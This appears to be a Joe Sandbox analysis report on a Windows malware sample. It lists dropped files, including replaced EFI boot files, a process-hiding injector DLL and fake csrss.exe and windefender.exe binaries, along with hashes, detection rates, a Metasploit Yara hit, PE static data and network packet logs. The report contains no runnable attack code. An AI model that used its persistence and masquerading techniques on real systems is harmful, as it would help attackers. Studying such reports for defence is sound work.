                                                                    SHA-512:5057F569321E7F3E40CF427D87FBFD4331E33914A61FAB059AE870BC6C17640E63CDFB7AE323846F161B124875BA874BED3A674D434CA3E5BC8116F6600062EA
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Joe Sandbox View:
                                                                    • Filename: app.exe, Detection: malicious, Browse
                                                                    • Filename: csrss.exe, Detection: malicious, Browse
                                                                    • Filename: csrss.exe, Detection: malicious, Browse
                                                                    • Filename: gFNUQfsbhl.exe, Detection: malicious, Browse
                                                                    • Filename: AHRwK0YGzi.exe, Detection: malicious, Browse
                                                                    • Filename: xYVQ2CgP0M.exe, Detection: malicious, Browse
                                                                    • Filename: HAZhIgUBm9.exe, Detection: malicious, Browse
                                                                    • Filename: hwvUt9M5T0.exe, Detection: malicious, Browse
                                                                    • Filename: 7u479GG98a.exe, Detection: malicious, Browse
                                                                    • Filename: bjEAtgsQV8.exe, Detection: malicious, Browse
                                                                    • Filename: bxW8vusMVJ.exe, Detection: malicious, Browse
                                                                    • Filename: 5uy2bFmu5S.exe, Detection: malicious, Browse
                                                                    • Filename: ddscRyPcLJ.exe, Detection: malicious, Browse
                                                                    • Filename: v1Ni5GOWI6.exe, Detection: malicious, Browse
                                                                    • Filename: A9j7TdY8pG.exe, Detection: malicious, Browse
                                                                    • Filename: 10hORi8M8E.exe, Detection: malicious, Browse
                                                                    • Filename: 5H9JkoJNvF.exe, Detection: malicious, Browse
                                                                    • Filename: mLvt2Sebz3.exe, Detection: malicious, Browse
                                                                    • Filename: 3GF9iwTaki.exe, Detection: malicious, Browse
                                                                    • Filename: Meta.exe, Detection: malicious, Browse
                                                                    B:\EFI\Microsoft\Boot\fw.efi (copy)
                                                                    Process:C:\Windows\rss\csrss.exe
                                                                    File Type:MS-DOS executable
                                                                    Category:dropped
                                                                    Size (bytes):7680
                                                                    Entropy (8bit):4.486535052248291
                                                                    Encrypted:false
                                                                    SSDEEP:48:glTSYARWU4VIDJY5fxSgwG89gAgseSNhcl7HoE4h2KP+59L+1o7InTJ/R9W3afJX:stOWU+rpT8ZeSNul7IEkdAL+pt/63
                                                                    MD5:17ACB515B5FA45DEF030B191E5BC7991
                                                                    SHA1:539E0729C6FE8460F20A0DF044DCE5D3AB629E7C
                                                                    SHA-256:9FDB7C1359F3F2F7279F1DF4BDE648C080231ED21A22906E908EF3F91F0D00EE
                                                                    SHA-512:5057F569321E7F3E40CF427D87FBFD4331E33914A61FAB059AE870BC6C17640E63CDFB7AE323846F161B124875BA874BED3A674D434CA3E5BC8116F6600062EA
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    C:\EFI\Boot\EfiGuardDxe.efi
                                                                    Process:C:\Windows\rss\csrss.exe
                                                                    File Type:MS-DOS executable
                                                                    Category:dropped
                                                                    Size (bytes):279552
                                                                    Entropy (8bit):4.553173975914215
                                                                    Encrypted:false
                                                                    SSDEEP:3072:ekODsOuozgl9aXsRzZZZZrUhFapDL4k2yntc:ekeklesRD6yt
                                                                    MD5:2B84CB96AE6280C2020FA46E4A8A07D8
                                                                    SHA1:E920E40CFC0C6A805D657C8F23F9C0612CD39F59
                                                                    SHA-256:01E86A4DFE6E0DE7857B3CF2FAFD041C8B3A3241E00844CB6BFBD3BFAE2D36BC
                                                                    SHA-512:F1A6598116F78FBA1F9531301A7313AC204BAB3B7AEBC299F69F2ED406F4EDAFC3410DB860E93D0DC7C24398F5A7FF595764400F31A3A06679FD6EC0EFB116D9
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    C:\EFI\Boot\bootx64.efi
                                                                    Process:C:\Windows\rss\csrss.exe
                                                                    File Type:MS-DOS executable
                                                                    Category:dropped
                                                                    Size (bytes):7680
                                                                    Entropy (8bit):4.486535052248291
                                                                    Encrypted:false
                                                                    SSDEEP:48:glTSYARWU4VIDJY5fxSgwG89gAgseSNhcl7HoE4h2KP+59L+1o7InTJ/R9W3afJX:stOWU+rpT8ZeSNul7IEkdAL+pt/63
                                                                    MD5:17ACB515B5FA45DEF030B191E5BC7991
                                                                    SHA1:539E0729C6FE8460F20A0DF044DCE5D3AB629E7C
                                                                    SHA-256:9FDB7C1359F3F2F7279F1DF4BDE648C080231ED21A22906E908EF3F91F0D00EE
                                                                    SHA-512:5057F569321E7F3E40CF427D87FBFD4331E33914A61FAB059AE870BC6C17640E63CDFB7AE323846F161B124875BA874BED3A674D434CA3E5BC8116F6600062EA
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    C:\EFI\Microsoft\Boot\bootmgfw.efi
                                                                    Process:C:\Windows\rss\csrss.exe
                                                                    File Type:MS-DOS executable
                                                                    Category:dropped
                                                                    Size (bytes):7680
                                                                    Entropy (8bit):4.486535052248291
                                                                    Encrypted:false
                                                                    SSDEEP:48:glTSYARWU4VIDJY5fxSgwG89gAgseSNhcl7HoE4h2KP+59L+1o7InTJ/R9W3afJX:stOWU+rpT8ZeSNul7IEkdAL+pt/63
                                                                    MD5:17ACB515B5FA45DEF030B191E5BC7991
                                                                    SHA1:539E0729C6FE8460F20A0DF044DCE5D3AB629E7C
                                                                    SHA-256:9FDB7C1359F3F2F7279F1DF4BDE648C080231ED21A22906E908EF3F91F0D00EE
                                                                    SHA-512:5057F569321E7F3E40CF427D87FBFD4331E33914A61FAB059AE870BC6C17640E63CDFB7AE323846F161B124875BA874BED3A674D434CA3E5BC8116F6600062EA
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                                                                    Process:C:\Windows\rss\csrss.exe
                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):101376
                                                                    Entropy (8bit):5.951577458824018
                                                                    Encrypted:false
                                                                    SSDEEP:3072:U3JJpaHtGsxJZ7zmaUMf2ETb4w1GMYbuT:csTF5U3EfndT
                                                                    MD5:09031A062610D77D685C9934318B4170
                                                                    SHA1:880F744184E7774F3D14C1BB857E21CC7FE89A6D
                                                                    SHA-256:778BD69AF403DF3C4E074C31B3850D71BF0E64524BEA4272A802CA9520B379DD
                                                                    SHA-512:9A276E1F0F55D35F2BF38EB093464F7065BDD30A660E6D1C62EED5E76D1FB2201567B89D9AE65D2D89DC99B142159E36FB73BE8D5E08252A975D50544A7CDA27
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Metadefender, Detection: 46%, Browse
                                                                    • Antivirus: ReversingLabs, Detection: 59%
                                                                    C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe
                                                                    Process:C:\Windows\rss\csrss.exe
                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):288256
                                                                    Entropy (8bit):6.31266455792162
                                                                    Encrypted:false
                                                                    SSDEEP:3072:qbHszDaOJ8u2HHFIWr6e29kOnK7qFQ8wMii5I7kGvNjzMuszHshoY46bEydJ+dK9:SA3IlIA6e29vngqS8wMmuooh8z+8F
                                                                    MD5:D98E33B66343E7C96158444127A117F6
                                                                    SHA1:BB716C5509A2BF345C6C1152F6E3E1452D39D50D
                                                                    SHA-256:5DE4E2B07A26102FE527606CE5DA1D5A4B938967C9D380A3C5FE86E2E34AAAF1
                                                                    SHA-512:705275E4A1BA8205EB799A8CF1737BC8BA686925E52C9198A6060A7ABEEE65552A85B814AC494A4B975D496A63BE285F19A6265550585F2FC85824C42D7EFAB5
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Metadefender, Detection: 14%, Browse
                                                                    • Antivirus: ReversingLabs, Detection: 73%
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................|..............................................t...........Rich...................PE..d...l.D`..........".................T..........@..........................................`.....................................................(............`...'..............`...@...8...............................8............................................text...H........................... ..`.rdata...9.......:..................@..@.data...`....0......................@....pdata...'...`...(..................@..@_RDATA...............V..............@..@.rsrc................X..............@..@.reloc..`............Z..............@..B........................................................................................................................................................................................................
                                                                    C:\Windows\Logs\CBS\CBS.log
                                                                    Process:C:\Windows\servicing\TrustedInstaller.exe
                                                                    File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                    Category:modified
                                                                    Size (bytes):3014656
                                                                    Entropy (8bit):5.317147680147588
                                                                    Encrypted:false
                                                                    SSDEEP:6144:TLS5YygL1mnGVFQa/qJIxOfTFyKQel5lmhSVjfChq4TMmdqLO:TL1dqLO
                                                                    MD5:49E7A7625D816E9960A34E806C14B6C4
                                                                    SHA1:E71D5D8B9EAA9C40587BD73034C508C0CC3F51CF
                                                                    SHA-256:B249DE239817B1F6E3151102AB803CE412890A0DEB3E644AB567573F9317D3AA
                                                                    SHA-512:F63E88FA79FE2730156F0C9F55C0D9B0F226F419E82749786856BE93937DC12378835F9D611C7E8F1834B02DAD88EF07BC59965039E129E3C17F93DD01965D67
                                                                    Malicious:false
                                                                    Preview: .2019-06-27 00:55:29, Info CBS TI: --- Initializing Trusted Installer ---..2019-06-27 00:55:29, Info CBS TI: Last boot time: 2019-06-27 00:49:51.660..2019-06-27 00:55:29, Info CBS Starting TrustedInstaller initialization...2019-06-27 00:55:29, Info CBS Lock: New lock added: CCbsPublicSessionClassFactory, level: 30, total lock:4..2019-06-27 00:55:29, Info CBS Lock: New lock added: CCbsPublicSessionClassFactory, level: 30, total lock:5..2019-06-27 00:55:29, Info CBS Lock: New lock added: WinlogonNotifyLock, level: 8, total lock:6..2019-06-27 00:55:29, Info CBS Ending TrustedInstaller initialization...2019-06-27 00:55:29, Info CBS Starting the TrustedInstaller main loop...2019-06-27 00:55:29, Info CBS TrustedInstaller service starts successfully...2019-06-27 00:55:29, Info CBS No startup pr
                                                                    C:\Windows\rss\csrss.exe
                                                                    Process:C:\Users\user\Desktop\jkDmft1Qoe.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):9054208
                                                                    Entropy (8bit):6.3340959539901585
                                                                    Encrypted:false
                                                                    SSDEEP:98304:XYgmMiJdljVuezWku32WnMpP6KE1dj/DxMLgMhZytTVhg5iqR:XYgjiJR4MpP6KCxMLphwVhG
                                                                    MD5:099AD37CECCDFA74229D976B10973736
                                                                    SHA1:1B6D65319DCB21FA94310C04BC3ABD89B90B4699
                                                                    SHA-256:DF84D3E83B4105F9178E518CA69E1A2EC3116D3223003857D892B8A6F64B05BA
                                                                    SHA-512:5E40B33665E769EEA3C506EB77F7790E11EAAF296402F7D78CD1644D434C88A593089C5349A6F894A9E6D24C96531B870D3F9BF72A021465A6D3FB52BA1FB9C2
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: C:\Windows\rss\csrss.exe, Author: Joe Security
                                                                    Antivirus:
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: Metadefender, Detection: 34%, Browse
                                                                    • Antivirus: ReversingLabs, Detection: 47%
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........&................)...1...............X...@............................................................................0................................................................................... .X..............................text...E.).......).................`..`.rdata........).......).............@..@.data.... 3...X...1...X.............@....idata..0..........."..............@....symtab..............&.................B........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    C:\Windows\windefender.exe
                                                                    Process:C:\Windows\rss\csrss.exe
                                                                    File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed
                                                                    Category:modified
                                                                    Size (bytes):2102272
                                                                    Entropy (8bit):7.879347868736008
                                                                    Encrypted:false
                                                                    SSDEEP:49152:1+yuly+dcYwIx9qadRmAYBfo9hazz2Du5VDyn:1Cy+qa9qWmAYBQfazzpDy
                                                                    MD5:E0A50C60A85BFBB9ECF45BFF0239AAA3
                                                                    SHA1:AE0E12BC885CB5D4D26C49F6AE20ED40313EDF99
                                                                    SHA-256:FC8D064E05EBE37D661AECCB78F91085845E9E28CCFF1F9B08FD373830E38B7F
                                                                    SHA-512:03D1440B462B872B7AE4FCCBB455FC0C3AB4E9BF13D07726CE2A9FF9CE4A0E7632A45AF4B52265973D51C8C9D6E24CE84EF81FBAD23CDDF04B64F461FA55050D
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 41%
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........K............... ......p-...M...-...M...@...........................M...............................................M.....................................................................................................................UPX0.....p-.............................UPX1...... ...-... .................@...UPX2..........M....... .............@...3.95.UPX!....Y.P....dM... ...K.&'....... Go build ID: "8LgdNw10OMnjnEaf..o.ouob/F_u>d7bw5LzGyMt067q/f_4E....n-IIykrT4Xu-NukD/RUnzYH.IbGfj....1LuaRla". ...d...........;a.v ....'....D$...$...`..k..&...............f.......dnl.L$h......m..g$....4..$....,.....\H......1.1.TP....~..|.\Z.;cpu.u.d,.T.@.....iT=........H9.............Y...?.............l.....0.9....lX..?(.|$<).......!..}...$.T..$0............Z..\*f..on....m.......;5al..p7.......M..$.........L....A....9.}..w._.9.- .9....5...p........
                                                                    \Device\Null
                                                                    Process:C:\Windows\SysWOW64\sc.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):39
                                                                    Entropy (8bit):3.964228182058903
                                                                    Encrypted:false
                                                                    SSDEEP:3:fxjRCqjv:ZMc
                                                                    MD5:2F1A2A9AA9E93E390CC54C36BDB0561B
                                                                    SHA1:BC13C3DAE9A3C2A7E45F08F2EF1BB14893078EC7
                                                                    SHA-256:706A0C615566BE5CC8D24596CD765A00BE7D5E036CA006DFBD8DE7BC6F7FA719
                                                                    SHA-512:4204246AF86876511D1748734BADD3008297EBBFD2E306BC00AED13BD5F5B2A946A0C5A72F3988429A5A4F09B2BFC4E2406D07E87A6F8FDD90309B2C9CCF97FF
                                                                    Malicious:false
                                                                    Preview: [SC] SetServiceObjectSecurity SUCCESS..

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                    Entropy (8bit):6.3340959539901585
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • VXD Driver (31/22) 0.00%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:jkDmft1Qoe.exe
                                                                    File size:9054208
                                                                    MD5:099ad37ceccdfa74229d976b10973736
                                                                    SHA1:1b6d65319dcb21fa94310c04bc3abd89b90b4699
                                                                    SHA256:df84d3e83b4105f9178e518ca69e1a2ec3116d3223003857d892b8a6f64b05ba
                                                                    SHA512:5e40b33665e769eea3c506eb77f7790e11eaaf296402f7d78cd1644d434c88a593089c5349a6f894a9e6d24c96531b870d3f9bf72a021465a6d3fb52ba1fb9c2
                                                                    SSDEEP:98304:XYgmMiJdljVuezWku32WnMpP6KE1dj/DxMLgMhZytTVhg5iqR:XYgjiJR4MpP6KCxMLphwVhG
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........&................)...1...............X...@........................................................................

                                                                    File Icon

                                                                    Icon Hash:00828e8e8686b000

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x451610
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DEBUG_STRIPPED, RELOCS_STRIPPED
                                                                    DLL Characteristics:
                                                                    Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:6
                                                                    OS Version Minor:1
                                                                    File Version Major:6
                                                                    File Version Minor:1
                                                                    Subsystem Version Major:6
                                                                    Subsystem Version Minor:1
                                                                    Import Hash:1cd364a9e949d5ecebd6c614e64bc545

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    jmp 00007F8A94A15390h
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    mov ebx, dword ptr [esp+04h]
                                                                    mov dword ptr fs:[00000034h], 00000000h
                                                                    mov ebp, esp
                                                                    mov ecx, dword ptr [ebx+04h]
                                                                    mov eax, ecx
                                                                    shl eax, 02h
                                                                    sub esp, eax
                                                                    mov edi, esp
                                                                    mov esi, dword ptr [ebx+08h]
                                                                    cld
                                                                    rep movsd
                                                                    call dword ptr [ebx]
                                                                    mov esp, ebp
                                                                    mov ebx, dword ptr [esp+04h]
                                                                    mov dword ptr [ebx+0Ch], eax
                                                                    mov dword ptr [ebx+10h], edx
                                                                    mov eax, dword ptr fs:[00000034h]
                                                                    mov dword ptr [ebx+14h], eax
                                                                    ret
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    sub esp, 18h
                                                                    mov dword ptr [esp], FFFFFFF4h
                                                                    mov ebp, esp
                                                                    call dword ptr [0098A068h]
                                                                    mov esp, ebp
                                                                    mov dword ptr [esp], eax
                                                                    mov edx, 00CB8E00h
                                                                    mov dword ptr [esp+04h], edx
                                                                    mov edx, dword ptr [00CB8964h]
                                                                    mov dword ptr [esp+08h], edx
                                                                    lea edx, dword ptr [esp+14h]
                                                                    mov dword ptr [edx], 00000000h
                                                                    mov dword ptr [esp+0Ch], edx
                                                                    mov dword ptr [esp+10h], 00000000h
                                                                    call dword ptr [0098A020h]
                                                                    mov esi, ebp
                                                                    add esp, 18h
                                                                    ret
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    mov eax, dword ptr fs:[00000034h]
                                                                    mov dword ptr [esp+04h], eax
                                                                    ret
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    mov ecx, dword ptr [esp+04h]
                                                                    sub esp, 28h
                                                                    mov dword ptr [esp+1Ch], ebx
                                                                    mov dword ptr [esp+10h], ebp
                                                                    mov dword ptr [esp+14h], esi
                                                                    mov dword ptr [esp+18h], edi

                                                                    Data Directories

                                                                    Name | Virtual Address | Virtual Size | Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8bd000 | 0x330 | .idata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x58a020 | 0x84 | .data
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                                    Sections

                                                                    Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                    .text | 0x1000 | 0x29d345 | 0x29d400 | unknown | unknown | unknown | unknown | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                    .rdata | 0x29f000 | 0x2ea8ab | 0x2eaa00 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .data | 0x58a000 | 0x3320d8 | 0x31a000 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                    .idata | 0x8bd000 | 0x330 | 0x400 | False | 0.4326171875 | data | 4.12245366014 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                    .symtab | 0x8be000 | 0x4 | 0x200 | False | 0.02734375 | data | 0.0203931352361 | IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                    Imports

                                                                    DLL | Import
                                                                    kernel32.dll | WriteFile, WriteConsoleW, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, SwitchToThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, LoadLibraryA, LoadLibraryW, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatus, GetProcessAffinityMask, GetProcAddress, GetEnvironmentStringsW, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateThread, CreateIoCompletionPort, CreateEventA, CloseHandle, AddVectoredExceptionHandler

                                                                    Network Behavior

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    Oct 18, 2021 08:01:45.344635963 CEST44349769104.21.79.9192.168.2.4
                                                                    Oct 18, 2021 08:01:45.344707966 CEST49769443192.168.2.4104.21.79.9
                                                                    Oct 18, 2021 08:01:45.348368883 CEST49769443192.168.2.4104.21.79.9
                                                                    Oct 18, 2021 08:01:45.348464012 CEST44349769104.21.79.9192.168.2.4
                                                                    Oct 18, 2021 08:01:45.348721027 CEST49769443192.168.2.4104.21.79.9
                                                                    Oct 18, 2021 08:01:45.392901897 CEST49769443192.168.2.4104.21.79.9
                                                                    Oct 18, 2021 08:01:45.392926931 CEST44349769104.21.79.9192.168.2.4
                                                                    Oct 18, 2021 08:01:45.445388079 CEST49769443192.168.2.4104.21.79.9
                                                                    Oct 18, 2021 08:01:57.751687050 CEST49767443192.168.2.4172.67.139.144
                                                                    Oct 18, 2021 08:01:57.751708031 CEST44349767172.67.139.144192.168.2.4
                                                                    Oct 18, 2021 08:02:03.621248007 CEST49768443192.168.2.4172.67.139.144
                                                                    Oct 18, 2021 08:02:03.621263027 CEST44349768172.67.139.144192.168.2.4
                                                                    Oct 18, 2021 08:02:15.400670052 CEST49769443192.168.2.4104.21.79.9
                                                                    Oct 18, 2021 08:02:15.400715113 CEST44349769104.21.79.9192.168.2.4
                                                                    Oct 18, 2021 08:02:17.978424072 CEST44349767172.67.139.144192.168.2.4
                                                                    Oct 18, 2021 08:02:17.978668928 CEST44349767172.67.139.144192.168.2.4
                                                                    Oct 18, 2021 08:02:17.978759050 CEST49767443192.168.2.4172.67.139.144
                                                                    Oct 18, 2021 08:02:17.979052067 CEST49767443192.168.2.4172.67.139.144
                                                                    Oct 18, 2021 08:02:17.979089022 CEST44349767172.67.139.144192.168.2.4
                                                                    Oct 18, 2021 08:02:17.979105949 CEST49767443192.168.2.4172.67.139.144
                                                                    Oct 18, 2021 08:02:17.979152918 CEST44349767172.67.139.144192.168.2.4
                                                                    Oct 18, 2021 08:02:21.835602045 CEST44349768172.67.139.144192.168.2.4
                                                                    Oct 18, 2021 08:02:21.835856915 CEST44349768172.67.139.144192.168.2.4
                                                                    Oct 18, 2021 08:02:21.835916996 CEST49768443192.168.2.4172.67.139.144
                                                                    Oct 18, 2021 08:02:21.836183071 CEST49768443192.168.2.4172.67.139.144
                                                                    Oct 18, 2021 08:02:21.836210966 CEST44349768172.67.139.144192.168.2.4
                                                                    Oct 18, 2021 08:02:35.164239883 CEST44349769104.21.79.9192.168.2.4
                                                                    Oct 18, 2021 08:02:35.164356947 CEST44349769104.21.79.9192.168.2.4
                                                                    Oct 18, 2021 08:02:35.164427996 CEST49769443192.168.2.4104.21.79.9
                                                                    Oct 18, 2021 08:02:35.164875984 CEST49769443192.168.2.4104.21.79.9
                                                                    Oct 18, 2021 08:02:35.164892912 CEST44349769104.21.79.9192.168.2.4
                                                                    Oct 18, 2021 08:02:35.164958954 CEST49769443192.168.2.4104.21.79.9
                                                                    Oct 18, 2021 08:02:35.164968014 CEST44349769104.21.79.9192.168.2.4
                                                                    Oct 18, 2021 08:02:35.243710041 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.259744883 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.259849072 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.261605024 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.277569056 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.287981033 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.288007021 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.288022995 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.288041115 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.288058043 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.288084984 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.288090944 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.288100004 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.288113117 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.288130999 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.288144112 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.288214922 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.288294077 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.288865089 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.288887978 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.288902998 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.288921118 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.288933992 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.289105892 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.289697886 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.289748907 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.289767027 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.289792061 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.289796114 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.289833069 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.289944887 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.290081978 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.290673018 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.290693045 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.290704966 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.290718079 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.290827990 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.291251898 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.291631937 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.291671038 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.291702032 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.291752100 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.291779995 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.296773911 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.296801090 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.296896935 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.303951025 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.303976059 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.303991079 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.304007053 CEST8049816172.67.196.11192.168.2.4
